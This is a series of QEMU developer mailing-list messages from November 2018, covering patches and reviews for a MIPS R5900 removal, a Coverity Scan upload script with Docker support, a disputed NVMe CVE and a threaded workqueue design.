-/* Generate #UD for the current instruction.  The assumption here is that
-   the instruction is known, but it isn't allowed in the current cpu mode.  */
-static void gen_illegal_opcode(DisasContext *s)
-{
-gen_exception(s, EXCP06_ILLOP, s->pc_start - s->cs_base);
-}
-
 /* Similarly, except that the assumption here is that we don't decode
the instruction at all -- either a missing opcode, an unimplemented
feature, or just a bogus instruction stream.  */
-- 
2.17.2

Re: [Qemu-devel] [PATCH] target/mips: Disable R5900 support

[Philippe Mathieu-Daudé]

Hi Aleksandar,

On Tue, Nov 13, 2018 at 8:08 PM Aleksandar Markovic
 wrote:
>
> From: Aleksandar Markovic 
>
> Disable R5900 support. There are some outstanding issues related
> to ABI support and emulation accuracy, that were not understood
> well during review process. Disable to avoid backward compatibility
> issues.

Can you add:

This reverts commit ed4f49ba9bb56ebca6987b1083255daf6c89b5de.

Or

Fixes: ed4f49ba9

when applying?

>
> Signed-off-by: Aleksandar Markovic 
> ---
>  target/mips/translate_init.inc.c | 59 
> 
>  1 file changed, 59 deletions(-)
>
> diff --git a/target/mips/translate_init.inc.c 
> b/target/mips/translate_init.inc.c
> index 85da4a2..acab097 100644
> --- a/target/mips/translate_init.inc.c
> +++ b/target/mips/translate_init.inc.c
> @@ -411,65 +411,6 @@ const mips_def_t mips_defs[] =
>  .mmu_type = MMU_TYPE_R4000,
>  },
>  {
> -/*
> - * The Toshiba TX System RISC TX79 Core Architecture manual
> - *
> - * https://wiki.qemu.org/File:C790.pdf
> - *
> - * describes the C790 processor that is a follow-up to the R5900.
> - * There are a few notable differences in that the R5900 FPU
> - *
> - * - is not IEEE 754-1985 compliant,
> - * - does not implement double format, and
> - * - its machine code is nonstandard.
> - */
> -.name = "R5900",
> -.CP0_PRid = 0x2E00,
> -/* No L2 cache, icache size 32k, dcache size 32k, uncached 
> coherency. */
> -.CP0_Config0 = (0x3 << 9) | (0x3 << 6) | (0x2 << CP0C0_K0),
> -.CP0_Status_rw_bitmask = 0xF4C79C1F,
> -#ifdef CONFIG_USER_ONLY
> -/*
> - * R5900 hardware traps to the Linux kernel for IEEE 754-1985 and 
> LL/SC
> - * emulation. For user only, QEMU is the kernel, so we emulate the 
> traps
> - * by simply emulating the instructions directly.
> - *
> - * Note: Config1 is only used internally, the R5900 has only Config0.
> - */
> -.CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU),
> -.CP0_LLAddr_rw_bitmask = 0x,
> -.CP0_LLAddr_shift = 4,
> -.CP1_fcr0 = (0x38 << FCR0_PRID) | (0x0 << FCR0_REV),
> -.CP1_fcr31 = 0,
> -.CP1_fcr31_rw_bitmask = 0x0183,
> -#else
> -/*
> - * The R5900 COP1 FPU implements single-precision floating-point
> - * operations but is not entirely IEEE 754-1985 compatible. In
> - * particular,
> - *
> - * - NaN (not a number) and +/- infinities are not supported;
> - * - exception mechanisms are not fully supported;
> - * - denormalized numbers are not supported;
> - * - rounding towards nearest and +/- infinities are not supported;
> - * - computed results usually differs in the least significant bit;
> - * - saturations can differ more than the least significant bit.
> - *
> - * Since only rounding towards zero is supported, the two least
> - * significant bits of FCR31 are hardwired to 01.
> - *
> - * FPU emulation is disabled here until it is implemented.
> - *
> - * Note: Config1 is only used internally, the R5900 has only Config0.
> - */
> -.CP0_Config1 = (47 << CP0C1_MMU),
> -#endif /* !CONFIG_USER_ONLY */
> -.SEGBITS = 32,
> -.PABITS = 32,
> -.insn_flags = CPU_R5900 | ASE_MMI,
> -.mmu_type = MMU_TYPE_R4000,
> -},
> -{
>  /* A generic CPU supporting MIPS32 Release 6 ISA.
> FIXME: Support IEEE 754-2008 FP.
>Eventually this should be replaced by a real CPU model. */
> --
> 2.7.4
>
>

Re: [Qemu-devel] [PATCH 1/2] scripts/run-coverity-scan: Script to run Coverity Scan build

[Peter Maydell]

On 13 November 2018 at 19:06, Eric Blake  wrote:
> On 11/13/18 12:46 PM, Peter Maydell wrote:
>>
>> Add a new script to automate the process of running the Coverity
>> Scan build tools and uploading the resulting tarball to the
>> website.
>>
>> This is intended eventually to be driven from Travis,
>> but it can be run locally, if you are a maintainer of the
>> QEMU project on the Coverity Scan website and have the secret
>> upload token.
>>
>> The script must be run directly on a Fedora 28 system.
>>
>> Signed-off-by: Peter Maydell 
>> ---

Thanks for the code review -- my shell scripting has some
bad habits in it.

>
>> +++ b/scripts/coverity-scan/run-coverity-scan
>> @@ -0,0 +1,292 @@
>> +#!/bin/sh -e
>
>
> set -e...
>
>> +check_upload_permissions() {
>
>
> ...and shell functions do NOT intuitively do what you would think. It's
> almost always better to use explicit error checking than to rely on set -e
> as a crutch, because then you don't get surprises.

I think we had this conversation with last year's version
of this script too :-)  As you say, the use of functions
makes it maybe better to use explicit error checking -- but
is there a standard syntax for that that doesn't make
basic
 foo
 bar
 baz
"do these things in order" code look weird and require special care?
At least with set -e you do get error checking, whereas scripts without
it tend to just plough on regardless (look at configure, which doesn't
use set -e but doesn't have explicit checking either).

>> +# Check whether we can do an upload to the server; will exit the
>> script
>> +# with status 1 if the check failed (usually a bad token);
>> +# will exit the script with status 0 if the check indicated that we
>> +# can't upload yet (ie we are at quota)
>> +# Assumes that PROJTOKEN, PROJNAME and DRYRUN have been initialized.
>> +
>> +echo "Checking upload permissions..."
>> +
>> +if ! up_perm="$(wget https://scan.coverity.com/api/upload_permitted
>> --post-data "token=$PROJTOKEN=$PROJNAME" -q -O -)"; then
>> +echo "Coverity Scan API access denied: bad token?"
>> +exit 1
>> +fi
>> +
>> +# Really up_perm is a JSON response with either
>> +# {upload_permitted:true} or {next_upload_permitted_at:}
>> +# We do some hacky string parsing instead of properly parsing it.
>> +case "$up_perm" in
>> +*upload_permitted*true*)
>> +echo "Coverity Scan: upload permitted"
>> +;;
>> +*next_upload_permitted_at*)
>> +if [ "$DRYRUN" = yes ]; then
>> +echo "Coverity Scan: upload quota reached; stopping here"
>> +# Exit success as this isn't a build error.
>> +exit 0
>> +else
>> +echo "Coverity Scan: upload quota reached, continuing dry
>> run"
>> +fi
>
>
> Did you get the logic backwards on this if?  Based on the error message, I
> was guessing the intended condition was [ "$DRYRUN" != yes ]

Yes, I did (I flipped the way I was doing checks from "unset
means no" to "check if it is yes", and didn't get it right;
I caught another instance of this later, but missed this one.)

>> +done
>> +
>> +if [ -z "$COVERITY_TOKEN" ]; then
>> +echo "COVERITY_TOKEN environment variable not set"
>> +exit 1
>> +fi
>> +
>> +if [ -z "$COVERITY_BUILD_CMD" ]; then
>> +echo "COVERITY_BUILD_CMD: using default 'make -j8'"
>> +COVERITY_BUILD_CMD="make -j8"
>
>
> Should this query 'nproc' instead of hard-coding -j8?

Probably. Legacy of this thing developing from a local hack
into something a bit more 'production'.

>> +fi
>> +
>> +if [ -z "$COVERITY_TOOL_BASE" ]; then
>> +echo "COVERITY_TOOL_BASE: using default /tmp/coverity-tools"
>> +COVERITY_TOOL_BASE=/tmp/coverity-tools
>> +fi
>> +
>> +if [ -z "$SRCDIR" ]; then
>> +SRCDIR="$(pwd)"
>
>
> Why not save a process, and just use SRCDIR="$PWD"

I never remember that $PWD exists, because when I'm doing
things on a shell command line I always use 'pwd'. But
it would be better, yes.

>> +TOOLBIN="$(cd "$COVERITY_TOOL_BASE" && echo
>> $(pwd)/coverity_tool/cov-analysis-*/bin)"
>
>
> If $CDPATH is set and $COVERITY_TOOL_BASE does not contain /, this could
> result in garbage being prepended to TOOLBIN as output from the 'cd'. Also,
> $PWD is nicer than $(pwd); but are you sure the glob in cov-analysis-* won't
> select too many files?

The glob is not great, but it is necessary to make the script
robust over new versions of the tools, which put the version
number in the cov-analysis-whatever directory name. If
we do ever get more than one file then the "test -x" below
will fail, and we'll be able to investigate and fix up the script.

CDPATH sounds like a horrific misfeature designed for breaking
scripts, so I'm not very interested in trying to work around it.
We don't seem to worry about this in configure either.
(I suppose we could just unset it at the start of the script.)

thanks
-- PMM

[Qemu-devel] [PATCH] target/mips: Disable R5900 support

[Aleksandar Markovic]

From: Aleksandar Markovic 

Disable R5900 support. There are some outstanding issues related
to ABI support and emulation accuracy, that were not understood
well during review process. Disable to avoid backward compatibility
issues.

Signed-off-by: Aleksandar Markovic 
---
 target/mips/translate_init.inc.c | 59 
 1 file changed, 59 deletions(-)

diff --git a/target/mips/translate_init.inc.c b/target/mips/translate_init.inc.c
index 85da4a2..acab097 100644
--- a/target/mips/translate_init.inc.c
+++ b/target/mips/translate_init.inc.c
@@ -411,65 +411,6 @@ const mips_def_t mips_defs[] =
 .mmu_type = MMU_TYPE_R4000,
 },
 {
-/*
- * The Toshiba TX System RISC TX79 Core Architecture manual
- *
- * https://wiki.qemu.org/File:C790.pdf
- *
- * describes the C790 processor that is a follow-up to the R5900.
- * There are a few notable differences in that the R5900 FPU
- *
- * - is not IEEE 754-1985 compliant,
- * - does not implement double format, and
- * - its machine code is nonstandard.
- */
-.name = "R5900",
-.CP0_PRid = 0x2E00,
-/* No L2 cache, icache size 32k, dcache size 32k, uncached coherency. 
*/
-.CP0_Config0 = (0x3 << 9) | (0x3 << 6) | (0x2 << CP0C0_K0),
-.CP0_Status_rw_bitmask = 0xF4C79C1F,
-#ifdef CONFIG_USER_ONLY
-/*
- * R5900 hardware traps to the Linux kernel for IEEE 754-1985 and LL/SC
- * emulation. For user only, QEMU is the kernel, so we emulate the 
traps
- * by simply emulating the instructions directly.
- *
- * Note: Config1 is only used internally, the R5900 has only Config0.
- */
-.CP0_Config1 = (1 << CP0C1_FP) | (47 << CP0C1_MMU),
-.CP0_LLAddr_rw_bitmask = 0x,
-.CP0_LLAddr_shift = 4,
-.CP1_fcr0 = (0x38 << FCR0_PRID) | (0x0 << FCR0_REV),
-.CP1_fcr31 = 0,
-.CP1_fcr31_rw_bitmask = 0x0183,
-#else
-/*
- * The R5900 COP1 FPU implements single-precision floating-point
- * operations but is not entirely IEEE 754-1985 compatible. In
- * particular,
- *
- * - NaN (not a number) and +/- infinities are not supported;
- * - exception mechanisms are not fully supported;
- * - denormalized numbers are not supported;
- * - rounding towards nearest and +/- infinities are not supported;
- * - computed results usually differs in the least significant bit;
- * - saturations can differ more than the least significant bit.
- *
- * Since only rounding towards zero is supported, the two least
- * significant bits of FCR31 are hardwired to 01.
- *
- * FPU emulation is disabled here until it is implemented.
- *
- * Note: Config1 is only used internally, the R5900 has only Config0.
- */
-.CP0_Config1 = (47 << CP0C1_MMU),
-#endif /* !CONFIG_USER_ONLY */
-.SEGBITS = 32,
-.PABITS = 32,
-.insn_flags = CPU_R5900 | ASE_MMI,
-.mmu_type = MMU_TYPE_R4000,
-},
-{
 /* A generic CPU supporting MIPS32 Release 6 ISA.
FIXME: Support IEEE 754-2008 FP.
   Eventually this should be replaced by a real CPU model. */
-- 
2.7.4

Re: [Qemu-devel] [PATCH 1/2] scripts/run-coverity-scan: Script to run Coverity Scan build

[Eric Blake]

On 11/13/18 12:46 PM, Peter Maydell wrote:

Add a new script to automate the process of running the Coverity
Scan build tools and uploading the resulting tarball to the
website.

This is intended eventually to be driven from Travis,
but it can be run locally, if you are a maintainer of the
QEMU project on the Coverity Scan website and have the secret
upload token.

The script must be run directly on a Fedora 28 system.

Signed-off-by: Peter Maydell 
---



+++ b/scripts/coverity-scan/run-coverity-scan
@@ -0,0 +1,292 @@
+#!/bin/sh -e


set -e...


+check_upload_permissions() {


...and shell functions do NOT intuitively do what you would think. It's 
almost always better to use explicit error checking than to rely on set 
-e as a crutch, because then you don't get surprises.



+# Check whether we can do an upload to the server; will exit the script
+# with status 1 if the check failed (usually a bad token);
+# will exit the script with status 0 if the check indicated that we
+# can't upload yet (ie we are at quota)
+# Assumes that PROJTOKEN, PROJNAME and DRYRUN have been initialized.
+
+echo "Checking upload permissions..."
+
+if ! up_perm="$(wget https://scan.coverity.com/api/upload_permitted --post-data 
"token=$PROJTOKEN=$PROJNAME" -q -O -)"; then
+echo "Coverity Scan API access denied: bad token?"
+exit 1
+fi
+
+# Really up_perm is a JSON response with either
+# {upload_permitted:true} or {next_upload_permitted_at:}
+# We do some hacky string parsing instead of properly parsing it.
+case "$up_perm" in
+*upload_permitted*true*)
+echo "Coverity Scan: upload permitted"
+;;
+*next_upload_permitted_at*)
+if [ "$DRYRUN" = yes ]; then
+echo "Coverity Scan: upload quota reached; stopping here"
+# Exit success as this isn't a build error.
+exit 0
+else
+echo "Coverity Scan: upload quota reached, continuing dry run"
+fi


Did you get the logic backwards on this if?  Based on the error message, 
I was guessing the intended condition was [ "$DRYRUN" != yes ]



+;;
+*)
+echo "Coverity Scan upload check: unexpected result $up_perm"
+exit 1
+;;
+esac
+}
+
+
+update_coverity_tools () {
+# Check for whether we need to download the Coverity tools
+# (either because we don't have a copy, or because it's out of date)
+# Assumes that COVERITY_TOOL_BASE, PROJTOKEN and PROJNAME are set.
+
+mkdir -p "$COVERITY_TOOL_BASE"
+cd "$COVERITY_TOOL_BASE"
+
+echo "Checking for new version of coverity build tools..."
+wget https://scan.coverity.com/download/linux64 --post-data 
"token=$PROJTOKEN=$PROJNAME=1" -O coverity_tool.md5.new
+
+if ! cmp -s coverity_tool.md5 coverity_tool.md5.new; then
+# out of date md5 or no md5: download new build tool
+# blow away the old build tool
+echo "Downloading coverity build tools..."
+rm -rf coverity_tool coverity_tool.tgz
+wget https://scan.coverity.com/download/linux64 --post-data 
"token=$PROJTOKEN=$PROJNAME" -O coverity_tool.tgz
+if ! (cat coverity_tool.md5.new; echo "  coverity_tool.tgz") | md5sum 
-c --status; then
+echo "Downloaded tarball didn't match md5sum!"
+exit 1
+fi
+# extract the new one, keeping it corralled in a 'coverity_tool' 
directory
+echo "Unpacking coverity build tools..."
+mkdir -p coverity_tool
+cd coverity_tool
+tar xf ../coverity_tool.tgz


Assumes GNU tar, with its auto-decompression. But then again, you said 
the entire script assumes Fedora 28, so that's not necessarily bad.



+cd ..
+mv coverity_tool.md5.new coverity_tool.md5


Here's an example of where 'set -e' could bite - if tar or mv fails 
(perhaps due to ENOSPC), the decision of whether the shell function 
immediately stops or continues on to the next line (without handling the 
error) is dependent on the context that the caller used when calling 
update_coverity_tools (that is, 'update_coverity_tools' and 
'update_coverity_tools || fail' behave differently).



+fi
+
+rm -f coverity_tool.md5.new
+}
+
+
+# Check user-provided environment variables and arguments
+DRYRUN=no
+UPDATE_ONLY=no
+
+while [ "$#" -ge 1 ]; do



+done
+
+if [ -z "$COVERITY_TOKEN" ]; then
+echo "COVERITY_TOKEN environment variable not set"
+exit 1
+fi
+
+if [ -z "$COVERITY_BUILD_CMD" ]; then
+echo "COVERITY_BUILD_CMD: using default 'make -j8'"
+COVERITY_BUILD_CMD="make -j8"


Should this query 'nproc' instead of hard-coding -j8?


+fi
+
+if [ -z "$COVERITY_TOOL_BASE" ]; then
+echo "COVERITY_TOOL_BASE: using default /tmp/coverity-tools"
+COVERITY_TOOL_BASE=/tmp/coverity-tools
+fi
+
+if [ -z "$SRCDIR" ]; then
+SRCDIR="$(pwd)"


Why not save a process, and just use SRCDIR="$PWD"

[Qemu-devel] [PATCH 2/2] scripts/coverity-scan: Add Docker support

[Peter Maydell]

Add support for running the Coverity Scan tools inside a Docker
container rather than directly on the host system.

Signed-off-by: Peter Maydell 
---
 scripts/coverity-scan/coverity-scan.docker | 120 +
 scripts/coverity-scan/run-coverity-scan|  58 ++
 2 files changed, 178 insertions(+)
 create mode 100644 scripts/coverity-scan/coverity-scan.docker

diff --git a/scripts/coverity-scan/coverity-scan.docker 
b/scripts/coverity-scan/coverity-scan.docker
new file mode 100644
index 000..81f69459954
--- /dev/null
+++ b/scripts/coverity-scan/coverity-scan.docker
@@ -0,0 +1,120 @@
+# syntax=docker/dockerfile:1.0.0-experimental
+#
+# Docker setup for running the "Coverity Scan" tools over the source
+# tree and uploading them to the website, as per
+# https://scan.coverity.com/projects/qemu/builds/new
+# We do this on a fixed config (currently Fedora 28 with a known
+# set of dependencies and a configure command that enables a specific
+# set of options) so that random changes don't result in our accidentally
+# dropping some files from the scan.
+# The work of actually doing the build is handled by the
+# run-coverity-scan script.
+
+
+FROM fedora:28
+ENV PACKAGES \
+alsa-lib-devel \
+bc \
+bison \
+bluez-libs-devel \
+brlapi-devel \
+bzip2 \
+bzip2-devel \
+ccache \
+clang \
+curl \
+cyrus-sasl-devel \
+device-mapper-multipath-devel \
+findutils \
+flex \
+gcc \
+gcc-c++ \
+gettext \
+git \
+glib2-devel \
+glusterfs-api-devel \
+gnutls-devel \
+gtk3-devel \
+hostname \
+libaio-devel \
+libasan \
+libattr-devel \
+libcap-devel \
+libcap-ng-devel \
+libcurl-devel \
+libepoxy-devel \
+libfdt-devel \
+libgbm-devel \
+libiscsi-devel \
+libjpeg-devel \
+libnfs-devel \
+libpng-devel \
+librbd-devel \
+libseccomp-devel \
+libssh2-devel \
+libubsan \
+libudev-devel \
+libusbx-devel \
+libxml2-devel \
+llvm \
+lzo-devel \
+make \
+mingw32-bzip2 \
+mingw32-curl \
+mingw32-glib2 \
+mingw32-gmp \
+mingw32-gnutls \
+mingw32-gtk3 \
+mingw32-libjpeg-turbo \
+mingw32-libpng \
+mingw32-libssh2 \
+mingw32-libtasn1 \
+mingw32-nettle \
+mingw32-pixman \
+mingw32-pkg-config \
+mingw32-SDL2 \
+mingw64-bzip2 \
+mingw64-curl \
+mingw64-glib2 \
+mingw64-gmp \
+mingw64-gnutls \
+mingw64-gtk3 \
+mingw64-libjpeg-turbo \
+mingw64-libpng \
+mingw64-libssh2 \
+mingw64-libtasn1 \
+mingw64-nettle \
+mingw64-pixman \
+mingw64-pkg-config \
+mingw64-SDL2 \
+ncurses-devel \
+nettle-devel \
+nss-devel \
+numactl-devel \
+perl \
+pixman-devel \
+pulseaudio-libs-devel \
+python3 \
+PyYAML \
+rdma-core-devel \
+SDL2-devel \
+snappy-devel \
+sparse \
+spice-server-devel \
+systemtap-sdt-devel \
+tar \
+usbredir-devel \
+virglrenderer-devel \
+vte3-devel \
+wget \
+which \
+xen-devel \
+xfsprogs-devel \
+zlib-devel
+ENV QEMU_CONFIGURE_OPTS --python=/usr/bin/python3
+
+RUN dnf install -y $PACKAGES
+RUN rpm -q $PACKAGES | sort > /packages.txt
+ENV COVERITY_TOOL_BASE=/coverity-tools
+COPY run-coverity-scan run-coverity-scan
+RUN --mount=type=secret,id=coverity.token,required ./run-coverity-scan 
--update-tools-only --tokenfile /run/secrets/coverity.token
diff --git a/scripts/coverity-scan/run-coverity-scan 
b/scripts/coverity-scan/run-coverity-scan
index 99495b04501..e89316c090d 100755
--- a/scripts/coverity-scan/run-coverity-scan
+++ b/scripts/coverity-scan/run-coverity-scan
@@ -29,6 +29,7 @@
 
 # Command line options:
 #   --dry-run : run the tools, but don't actually do the upload
+#   --docker : create and work inside a docker container
 #   --update-tools-only : update the cached copy of the tools, but don't run 
them
 #   --tokenfile : file to read Coverity token from
 #   --version ver : specify version being analyzed (default: ask git)
@@ -122,6 +123,7 @@ update_coverity_tools () {
 # Check user-provided environment variables and arguments
 DRYRUN=no
 UPDATE_ONLY=no
+DOCKER=no
 
 while [ "$#" -ge 1 ]; do
 case "$1" in
@@ -169,6 +171,10 @@ while [ "$#" -ge 1 ]; do
 SRCDIR="$1"
 shift
 ;;
+--docker)
+DOCKER=yes
+shift
+;;
 *)
 echo "Unexpected argument '$1'"
 exit 1
@@ -199,6 +205,10 @@ PROJTOKEN="$COVERITY_TOKEN"
 PROJNAME=QEMU
 TARBALL=cov-int.tar.xz
 
+if [ "$UPDATE_ONLY" = yes ] && [ "$DOCKER" = yes ]; then
+echo "Combining --docker and --update-only is not supported"
+exit 1
+fi
 
 if [ "$UPDATE_ONLY" = yes ]; then
 # Just do the tools update; we don't need to check whether
@@ -229,6 +239,54 @@ if [ -z "$COVERITY_EMAIL" ]; then
 COVERITY_EMAIL="$(git config user.email)"
 fi
 
+# Run ourselves 

[Qemu-devel] [PATCH 0/2] Automation for running Coverity Scan builds

[Peter Maydell]

This patchset is an attempt to automate the process of
running a Coverity Scan build and uploading it to the website.
(I had a go at this last year; the scripts here are based
on my older attempt, with some changes.)

Patch 1 is a script which will do a build-and-upload. It
requires that you have a Fedora 28 host with all the relevant
-devel packages installed, and that you run it in a clean directory.

Patch 2 improves on that by using Docker to set up the
build environment, so you can run it on any host and get
the same results, and it doesn't trash your source tree with
an in-place build.

Patch 1 I'm generally pretty happy with. Paolo, if you could
check the configure options against what you use at the moment
for uploads that would be very helpful. These are the set that
you gave me last time I asked, but I think that was long enough
ago that they may be a little out of date.

Patch 2 is a bit more RFC-ish -- it does work and you can do a
complete build-and-upload with it, but I was thrashing about
trying to get Docker to do what I wanted and I'm pretty sure
there are better ways to do it. In particular I was expecting
that once the script has run once and done the "set up F28,
download the coverity tools and unpack them", that a second
run would reuse a cached copy of that image, but the docker
build seems to repeat the download-and-unpack part.
NB that you need the bleeding-edge Docker 18.09 for the --secret
option which lets us pass the coverity magic token into the
build stage safely. Review from people who know Docker welcomed.


I would eventually like to set up Travis so it does the
build-and-upload automatically, but I think getting to a
point where coverity uploads are done with a process that
can be repeated reliably by anybody with maintainer rights
is useful in itself even if we don't want to do it via Travis.

thanks
-- PMM


Peter Maydell (2):
  scripts/run-coverity-scan: Script to run Coverity Scan build
  scripts/coverity-scan: Add Docker support

 MAINTAINERS|   5 +
 scripts/coverity-scan/coverity-scan.docker | 120 +++
 scripts/coverity-scan/run-coverity-scan| 350 +
 3 files changed, 475 insertions(+)
 create mode 100644 scripts/coverity-scan/coverity-scan.docker
 create mode 100755 scripts/coverity-scan/run-coverity-scan

-- 
2.19.1

[Qemu-devel] [PATCH 1/2] scripts/run-coverity-scan: Script to run Coverity Scan build

[Peter Maydell]

Add a new script to automate the process of running the Coverity
Scan build tools and uploading the resulting tarball to the
website.

This is intended eventually to be driven from Travis,
but it can be run locally, if you are a maintainer of the
QEMU project on the Coverity Scan website and have the secret
upload token.

The script must be run directly on a Fedora 28 system.

Signed-off-by: Peter Maydell 
---
 MAINTAINERS |   5 +
 scripts/coverity-scan/run-coverity-scan | 292 
 2 files changed, 297 insertions(+)
 create mode 100755 scripts/coverity-scan/run-coverity-scan

diff --git a/MAINTAINERS b/MAINTAINERS
index 126fe0be7eb..5f107d99061 100644
--- a/MAINTAINERS
+++ b/MAINTAINERS
@@ -1553,6 +1553,11 @@ M: Markus Armbruster 
 S: Supported
 F: scripts/coverity-model.c
 
+Coverity Scan integration
+M: Peter Maydell 
+S: Maintained
+F: scripts/coverity-scan/
+
 CPU
 L: qemu-devel@nongnu.org
 S: Supported
diff --git a/scripts/coverity-scan/run-coverity-scan 
b/scripts/coverity-scan/run-coverity-scan
new file mode 100755
index 000..99495b04501
--- /dev/null
+++ b/scripts/coverity-scan/run-coverity-scan
@@ -0,0 +1,292 @@
+#!/bin/sh -e
+
+# Upload a created tarball to Coverity Scan, as per
+# https://scan.coverity.com/projects/qemu/builds/new
+
+# This work is licensed under the terms of the GNU GPL version 2,
+# or (at your option) any later version.
+# See the COPYING file in the top-level directory.
+#
+# Copyright (c) 2017, 2018 Linaro Limited
+# Written by Peter Maydell
+
+# Note that this script will automatically download and
+# run the (closed-source) coverity build tools, so don't
+# use it if you don't trust them!
+
+# This script assumes that you're running it from a QEMU source
+# tree, and that tree is a fresh clean one, because we do an in-tree
+# build. (This is necessary so that the filenames that the Coverity
+# Scan server sees are relative paths that match up with the component
+# regular expressions it uses; an out-of-tree build won't work for this.)
+# The host machine should have as many of QEMU's dependencies
+# installed as possible, for maximum coverity coverage.
+
+# To do an upload you need to be a maintainer in the Coverity online
+# service, and you will need to know the "Coverity token", which is a
+# secret 8 digit hex string. You can find that from the web UI in the
+# project settings, if you have maintainer access there.
+
+# Command line options:
+#   --dry-run : run the tools, but don't actually do the upload
+#   --update-tools-only : update the cached copy of the tools, but don't run 
them
+#   --tokenfile : file to read Coverity token from
+#   --version ver : specify version being analyzed (default: ask git)
+#   --description desc : specify description of this version (default: ask git)
+#   --srcdir : QEMU source tree to analyze (default: current working dir)
+#
+# User-specifiable environment variables:
+#  COVERITY_TOKEN -- Coverity token
+#  COVERITY_EMAIL -- the email address to use for uploads (default:
+#looks at your git user.email config)
+#  COVERITY_BUILD_CMD -- make command (default: 'make -j8')
+#  COVERITY_TOOL_BASE -- set to directory to put coverity tools
+#(default: /tmp/coverity-tools)
+#
+# You must specify the token, either by environment variable or by
+# putting it in a file and using --tokenfile. Everything else has
+# a reasonable default if this is run from a git tree.
+
+check_upload_permissions() {
+# Check whether we can do an upload to the server; will exit the script
+# with status 1 if the check failed (usually a bad token);
+# will exit the script with status 0 if the check indicated that we
+# can't upload yet (ie we are at quota)
+# Assumes that PROJTOKEN, PROJNAME and DRYRUN have been initialized.
+
+echo "Checking upload permissions..."
+
+if ! up_perm="$(wget https://scan.coverity.com/api/upload_permitted 
--post-data "token=$PROJTOKEN=$PROJNAME" -q -O -)"; then
+echo "Coverity Scan API access denied: bad token?"
+exit 1
+fi
+
+# Really up_perm is a JSON response with either
+# {upload_permitted:true} or {next_upload_permitted_at:}
+# We do some hacky string parsing instead of properly parsing it.
+case "$up_perm" in
+*upload_permitted*true*)
+echo "Coverity Scan: upload permitted"
+;;
+*next_upload_permitted_at*)
+if [ "$DRYRUN" = yes ]; then
+echo "Coverity Scan: upload quota reached; stopping here"
+# Exit success as this isn't a build error.
+exit 0
+else
+echo "Coverity Scan: upload quota reached, continuing dry run"
+fi
+;;
+*)
+echo "Coverity Scan upload check: unexpected result $up_perm"
+exit 1
+;;
+esac
+}
+
+
+update_coverity_tools () {
+# Check for whether 

Re: [Qemu-devel] [PATCH] nvme: fix oob access issue(CVE-2018-16847)

[Paolo Bonzini]

On 02/11/2018 16:40, Keith Busch wrote:
> Hey, so why is this memory region access even considered valid if the
> request is out of range from what NVMe had registered for its
> MemoryRegion? Wouldn't it be better to not call the mr->ops->read/write
> if it's out of bounds? Otherwise every MemoryRegion needs to duplicate
> the same check, right?

Because some crazy devices have misaligned registers.

But actually this is not a problem because NVMe doesn't set
ops->impl.unaligned to true, so indeed no change is needed.

Paolo

> Would something like the following work (minimally tested)?

Re: [Qemu-devel] [PATCH] nvme: fix oob access issue(CVE-2018-16847)

[Paolo Bonzini]

On 13/11/2018 11:17, Kevin Wolf wrote:
> Am 13.11.2018 um 02:45 hat Li Qiang geschrieben:
>> Ping what't the status of this patch.
>>
>> I see Kevin's new pr doesn't contain this patch.
> 
> Oh, I thought you said that you wanted to fix this at a higher level so
> that the problem is caught before even getting into nvme code? If you
> don't, I can apply the patch for my next pull request.

As far as I know the bug doesn't exist.  Li Qiang, if you have a
reproducer please send it.

Prasad, please revoke the CVE.

Paolo

Re: [Qemu-devel] [PATCH v2 2/5] util: introduce threaded workqueue

[Emilio G. Cota]

On Tue, Nov 06, 2018 at 20:20:22 +0800, guangrong.x...@gmail.com wrote:
> From: Xiao Guangrong 
> 
> This modules implements the lockless and efficient threaded workqueue.
(snip)
> +++ b/util/threaded-workqueue.c
> +struct Threads {
> +/*
> + * in order to avoid contention, the @requests is partitioned to
> + * @threads_nr pieces, each thread exclusively handles
> + * @thread_request_nr requests in the array.
> + */
> +void *requests;
(snip)
> +/*
> + * the bit in these two bitmaps indicates the index of the ＠requests
> + * respectively. If it's the same, the corresponding request is free
> + * and owned by the user, i.e, where the user fills a request. Otherwise,
> + * it is valid and owned by the thread, i.e, where the thread fetches
> + * the request and write the result.
> + */
> +
> +/* after the user fills the request, the bit is flipped. */
> +unsigned long *request_fill_bitmap;
> +/* after handles the request, the thread flips the bit. */
> +unsigned long *request_done_bitmap;
(snip)
> +/* the request is pushed to the thread with round-robin manner */
> +unsigned int current_thread_index;
(snip)
> +QemuEvent ev;
(snip)
> +};

The fields I'm showing above are all shared by all worker threads.
This can lead to unnecessary contention. For example:
- Adjacent requests can share the same cache line, which might be
  written to by different worker threads (when setting request->done)

- The request_done bitmap is written to by worker threads every time
  a job completes. At high core counts with low numbers of job slots,
  this can result in high contention. For example, imagine we have
  16 threads with 4 jobs each. This only requires 64 bits == 8 bytes, i.e.
  much less than a cache line. Whenever a job completes, the cache line
  will be atomically updated by one of the 16 threads.

- The completion event (Threads.ev above) is written to by every thread.
  Again, this can result in contention at large core counts.

An orthogonal issue is the round-robin policy. This can give us fairness,
in that we guarantee that all workers get a similar number of jobs.
But giving one job at a time to each worker is suboptimal when the job
sizes are small-ish, because it misses out on the benefits of batching,
which amortize the cost of communication.
Given that the number of jobs that we have (at least in the benchmark)
are small, filling up a worker's queue before moving on to the next
can yield a significant speedup at high core counts.

I implemented the above on top of your series. The results are as follows:

 threaded-workqueue-bench -r 4 -m 2 -c 
20 -t #N
  Host: AMD Opteron(tm) Processor 
6376
  Thread pinning: #N+1 cores, 
same-socket first

 12 
+---+
|+   + + + + +A+ + + + +
 + + + + + +|
| $ 
 before ***B*** |
 10 |-+  $$ 
  +batching ###D###-|
|$$ 
  +per-thread-state $$$A$$$ |
|$$  AA 
|
| $AD D$A $A $ $ $A  A   $$   A 
   A  A$   AA$ A|
  8 |-+   D$AA  A# D$AA# A  $#D$$  $ $$ A  $   $A $A  
$$ A$ A$A $ $ AA   $A $  $A   $ A   +-|
|AA  B* B$DA D  DD# A #$$   A  A   $$AA  A  A$A  $  
A  A A$ AAA  A$A|
|   $DB*B  B $ $ BBD   $$  #D #D   A   A$A  
   A|
  6 |-+  $AA*B   *A *  *   $# D  D  D#  #D #D   D#
D#DD#D   D# D#  # ##D  D#   +-|
|   A BB   *   A DDD  D  D#D  DD#D  
D#D  D  DD  D  D# D#D  DD#DD|
|   $   B   
 D  |
| $A **BB B 
|
  4 |-+  A#  B   ***
  +-|
|$B *B  BB* B*  
  *BB*B   B*BB*BB*B  B *BB* B*BB|
|  $A  B   B  
BB*BB*BB*BB*BB*BB*BB **B ** BB|
  2 |-+   A 
  

